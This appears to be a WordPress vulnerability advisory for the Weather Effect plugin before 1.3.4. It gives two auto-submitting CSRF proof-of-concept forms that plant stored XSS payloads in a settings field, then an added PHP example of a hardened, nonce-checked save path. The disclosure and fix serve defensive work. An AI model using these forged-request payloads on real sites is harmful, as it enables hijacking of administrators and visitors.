WordPress Plugin Vulnerabilities

Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting

Description

The plugin does not have any CSRF checks in place when saving its settings, and does not validate or escape them, which could lead to a Stored Cross-Site Scripting issue.

v1.3.4 fixed the CSRF issue, but not the sanitisation/escaping fully. Another issue has been created for it.

Proof of Concept

To have the XSS only trigger in the frontend:

<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value="alert(location)||30">
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>

To have the XSS trigger in the backend as well:

<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value='"><img src onerror=alert(/XSS/)>'>
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>
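For contrast, a hardened settings-save path with the three controls the description says were missing (a nonce check against CSRF, input validation, and output escaping). This is an added example, not the plugin's code: the field names come from the proof of concept above, while the `we_example_*` function names and the `we_example_settings` option name are assumptions.

```php
<?php
// Added example (not the plugin's own code). Handler and option names are assumptions;
// the field names come from the proof of concept above.

// 1. Settings form: emit a nonce field alongside the inputs.
function we_example_render_form() {
    $opts = get_option( 'we_example_settings', array() );
    $min  = isset( $opts['christmas_min_size_leaf'] ) ? (int) $opts['christmas_min_size_leaf'] : 30;
    echo '<form method="post">';
    wp_nonce_field( 'we_example_save', 'we_example_nonce' ); // CSRF token tied to the session
    echo '<input type="number" name="christmas_min_size_leaf" value="' . esc_attr( $min ) . '">';
    echo '<input type="hidden" name="snow_action" value="save_setting">';
    submit_button();
    echo '</form>';
}

// 2. Save handler: reject requests without capability or a valid nonce, then validate every field.
function we_example_save_settings() {
    if ( ! isset( $_POST['snow_action'] ) || 'save_setting' !== $_POST['snow_action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() dies with a 403 if the nonce is missing or does not match.
    check_admin_referer( 'we_example_save', 'we_example_nonce' );

    $clean = array();
    // Numeric sizes: absint() turns a string such as "alert(location)||30" into 0, then the floor applies.
    $clean['christmas_min_size_leaf'] = max( 1, absint( $_POST['christmas_min_size_leaf'] ?? 30 ) );
    $clean['christmas_max_size_leaf'] = max( 1, absint( $_POST['christmas_max_size_leaf'] ?? 50 ) );
    // Enumerated choices: only accept values from a fixed allow-list.
    $allowed_types = array( 'snow_effect' );
    $type = sanitize_key( $_POST['christmas_types'] ?? '' );
    $clean['christmas_types'] = in_array( $type, $allowed_types, true ) ? $type : 'snow_effect';
    $clean['enable_weather_effect'] = empty( $_POST['enable_weather_effect'] ) ? 0 : 1;

    update_option( 'we_example_settings', $clean );
}

// 3. Front-end output: never concatenate option values into inline JS; JSON-encode them.
function we_example_print_config() {
    $opts = get_option( 'we_example_settings', array() );
    printf(
        '<script>var weExampleConfig = %s;</script>',
        wp_json_encode( array( 'minSize' => (int) ( $opts['christmas_min_size_leaf'] ?? 30 ) ) )
    );
}
```

With these in place the forged form above fails at `check_admin_referer()` before any option is written, and even a value that did reach storage would be reduced to an integer rather than echoed into the page.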

Affects Plugins

Fixed in 1.3.4

Classification

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-09-07
Added
2021-09-07
Last Updated
2023-01-30
